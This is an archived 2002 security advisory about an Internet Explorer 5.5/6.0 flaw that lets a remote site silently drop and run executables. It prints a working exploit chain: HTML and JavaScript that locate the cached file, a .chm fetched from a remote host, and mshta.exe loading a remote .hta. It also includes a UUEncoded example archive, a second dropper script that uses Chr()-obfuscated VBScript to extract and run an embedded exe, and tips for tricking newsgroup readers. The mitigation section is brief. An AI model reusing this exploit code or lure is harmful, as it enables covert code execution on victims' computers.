8th Feb 2002 [SBWID-5080]
COMMAND
IE may be fooled by remote site to download and run any file
SYSTEMS AFFECTED
Internet Explorer 5.5 and 6.0
PROBLEM
http-equiv [http://www.malware.com] posted :
Default installation of Internet Explorer 5.5 and 6.0 still allows us
to execute files on default installations of the target computer,
technically trivial silent delivery and installation of an executable
on the target computer.:
We cobble together new and old Components as follows : -
1. Courtesy of Georgi Guninski
see : [http://www.securityfocus.com/bid/1033]
2. Courtesy of Georgi Guninski
see : [http://www.securityfocus.com/bid/2456]
3. Mshta.exe http://www.malware.com/foobar.hta
see : [http://www.securitybugware.org/NT/1279.html]
Either 1 or 2 above canno\'t be exploited alone.
Nothing can be activated through the Temporary Internet Files unless
full path names are known for both showHelp calling and Click() of our
link.
However malware team was able to retrieve from the Temporary Internet
File a trojanised html, determine the location of it, write this
location out to a showHelp call and thereafter execute a specified
remote link.
Sample Exploit :
==============
We create a very simple *.html file like so:
<bgsound src=\"http://www.malware.com/malware.chm\">
this will pull our *.chm into the Temporary Internet File
when then include the Guninski scripting to determine the location of
our *.html file like so:
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf(\"\\\\\"));
path=unescape(path);
we then take that location information and write it to a simple html
form like so:
document.write(\'<FORM name=\"malware\"
ACTION=\"javascript:window.showHelp(document.forms[0].elements
[0].value)\">\');
document.write(\'<form><input type=\"hidden\" size=\"40\" maxlength=\"80\"
value=\"\'+path+\'\\\\malware[1].chm\"></form>\');
technical note: it seems the myriad of patching to date does not make
it possible to pass the location directly to the showHelp call. It must
be written to the form which can then be automatically submitted:
setTimeout(\'document.malware.submit()\',5000);
before we do all that we create our very simple malware.chm and include
our link object like so:
C:\\WINDOWS\\SYSTEM\\Mshta.exe,http://www.malware.com/foobar.hta
this is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta which
includes our executable. All without warning.
technical note: the possibility is excellent to repeat the entire
process above directly inside the *.chm file and drop an *.exe from
within the *.chm into the same Temporary Internet File. Using our
Guninski scripting to determine the location of the *.chm and write
that to the link parameter within it: value=\"\'+path+\'\\\\malware
[1].exe\"> and execute it.
So what happens?
===============
We construct our trojanised *.html file and send it off to our target
computer. This can be via mail or news. The recipient receives the mail
message and attached *.html file. We then convince our unsuspecting
recipient to open our *.html. This should be quite trivial,
particularly in news as the attached file is in fact nothing more than
a 500 byte html file.
Consider the following scenario in your favourite web design news
group:
Carefully note: there is a hardened security warning when attempting to
open attached *.html file. However our combination call for assistance
coupled with nothing more than a legitimate *.html file should prove
more than tempting:
screen shot: http://www.malware.com/duh.png 18KB
Why does it happen? ==================
Because our simple *.html file is an attachment, security has it
transfer to the Internet Temporary File for opening, under the security
browser\'s settings. However, precisely because it is physically opened
within the TIF, we can use our Guninski scripting to determine the
exact location, write that exact location to our form and call our
*.chm where it too resides.
Working Example below, includes harmless?? *.exe -- the *.chm is
hardcoded for win98. Due to pathetic technical reasons our *.chm is
off-site and may delay in transferring to the TIF and could possibly
fail, working example must be attached to mail or news.
UUEncoded
begin 644 help!.zip
M4$L#!!0``@`(``F21RQ5&;V@E`$``((\"```0````:\'1M;%]T86)L97,N:\'1M
M;&U238O;,!\"]&_P?!EULLUG;&UI:MG:@+)0&VJ:DV5.2@U:>Q%HLR>@CWK3T
MOU=R$]/\"\"AUFAC?OS1=43T>CG&S`:%:3UMK^OB@$[0:J,1>NLUQ0R6G.E)C\"
MK!5D$4<01W%4_7A8+[]O%L$N\"GB7EW/_X4(T#$,^92EQ`9V5`T\'/P)0TO$$-
M@^:6RR,8/*&F\'71<HAFA7`*C!N$?::!:\\Q,:H`:V=WM0&K;S/:!E@?[@)+-<
MR6M&FL71KS@R=:.8$RAM_KC^\\B&.>FK;VN3&/1FKT]MR9O*.&KN4#;ZL#BG9
M[4B677\'.E\\-HCVGP0G0B\"Y5CFE2?5NNO(*G`FER$\"7Q\\V\"Q7WVKR3$_4,,U[
M>S]PV:@A-ZT:/F/7IQ//06EAMN4^QPY#8+1/M\'.8D47RJF1(651<]LZ\"/?=>
MN>5-@Y(`&/[3NV]*XJ?PTJ$\\^A[(>^^.C#5);D(C-\\EN=RG6S_\'O5JMBI!T5
M#=H-%ZB<39-)_;H(/SC!;9HEL[O2OX\"\'W_!?$IE60&;SMP$#\'E`5T\\6,!_0\'
M4$L#!!0````(`)N21RSS>=1RX````\"L!```*````<F5A9&UE+G1X=\"5/RTK$
M0!\"\\!_(/]0\'KK\'I1]Y:5P`9,!!/Q*+U)NPG.(\\PTCOOWSD3H0W5U457]H&[O
MTY1%6<PBZV&_CS$J0SJ29S4ZDR]W\"K,8_2ETUAQ4QIDF$1IGB`/9*]C0HF$X
M!+HPG(?E&+\"Z((N]9\'EW/&`X-3W:]W[`L4;5H1J&ZOG4UMV`ID-;-2]X?4-7
M?_1;(_(F!08H_F7$16N,GDD89JN7V!VT&S-#=L+$FA/\\2N&+#4)6$+2[,0Z>
M5TW7[%D6U@D?D+PGC&[B:=/\'Q3X][I\"Z?G/>)/TU,W[(+_]/*_4\'4$L!`A0`
M%``\"``@`\"9)\'+%49O:\"4`0``@@(``!```````````0`@`+:!`````&AT;6Q?
M=&%B;&5S+FAT;6Q02P$\"%``4````\"`\";DD<L\\WG4<N`````K`0``\"@``````
L```!`\"``MH\'\"`0``<F5A9&UE+G1X=%!+!08``````@`\"`\'8```#*`@``````
`
end
854 bytes
Update (11 February 2002)
======
dzzie [http://geocities.com/dzzie] posted another exploit, proof of
concept on a chm exe dropper :
This works from Internet Temp files directory as well, all someone has
to do is choose the open option when they click a link to a chm file,
and they are done.
-------------------------------------------------
flow of events
-------------------------------------------------
1) chm opens
a) determines absolute path current folder
b) determines parent chm name (in case cached changes name)
c) detects winNT or win98 to work on both
2) chm name is used to auto generate vbs script data
abs path is used to auto generate html object data
script writes dynamically generated content to window
3) first object activated programatically....vbs script is echoed
into existance into same folder as parent chm file
4) waits 1sec then activates echoed.vbs file...this vbs file
reads the parent .chm and extracts a hello world exe that is
appended onto the chm file.
5) after exe is written to disk vbs script then activates it
-------------------------------------------------------------
script below
-------------------------------------------------------------
msg=\'<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\\\</h1></center>\'
function getChmAbsPath(){
t=unescape(location.href)
return t.substring(t.indexOf(\":\",4)+1,t.lastIndexOf(\"\\\\\")+1)
}
function getChmName(){
l=unescape(location.href)
chmName=l.substring(l.lastIndexOf(\"\\\\\")+1,l.lastIndexOf(\":\")-1)
t=\'Chr(92)+\'
for(i=0;i<chmName.length;i++){
t+= \'Chr(\' + chmName.charCodeAt(i) + \')+\'
}
return t.substring(0,t.length-1);
}
function getInterpreter(){
if(navigator.userAgent.indexOf(\'NT\') > 0){
return \'cmd\';
}else{
return \'command\';
}
}
vbs=\'fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):\'+
\'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):\'+
\'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):\'+
\'set i=createobject(fso):\'+
\'set o=createobject(fso):\'+
\'set w=createobject(wsc):\'+
\'pf=i.GetParentFolderName(WSCript.ScriptFullName):\'+
\'infile=pf+\' + getChmName() + \':\'+
\'outfile=pf+exename:\'+
\'OFFSET=XXXXXXX:\'+
\'Set ii=i.OpenTextFile(infile):\'+
\'Set oo=o.OpenTextFile(outfile,2,True):\'+
\'ii.Read OFFSET:\'+
\'While Not ii.AtEndOfStream:\'+
\'oo.Write Chr(Asc(ii.Read(1))):\'+
\'Wend:ii.close:oo.close:\'+
\'w.Run chr(34)+outfile+chr(34)\'
hit=\'<OBJECT id=shortcut^ type=\"application/x-oleobject\" \'+
\'classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" \'+
\'codebase=\"hhctrl.ocx\\#Version=4,72,8252,0\" width=100 \'+
\'height=100><PARAM name=\"Command\" value=\"ShortCut\"> \'+
\'<PARAM name=\"Text\" value=\"Text: \"> \'+
\'<PARAM name=\"Item1\" value=\\\',*\\\'> \'+
\'<PARAM name=\"Item2\" value=\"273,1,1\"></OBJECT> \'
scriptPath = getChmAbsPath() + \'echoed.vbs\'
cmd=new Array
cmd[1]= getInterpreter() + \',/c echo \' + vbs + \' > \"\' + scriptPath + \'\"\'
cmd[2]=\'wscript,\"\' + scriptPath + \'\"\'
function replace(h,i,c){
h = h.split(\'^\').join(i).split(\'*\').join(c)
return h
}
hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])
document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout(\"shortcut2.Click()\",1000)
SOLUTION
1. Be aware of \"innocent\" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. Disable the HHCtrl ActiveX control,
see:http://www.kb.cert.org/vuls/id/25249 ]
4. Disable or Remove Mshta.exe [although if an *.exe
embedded directly into the *.chm then this has no impact]
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
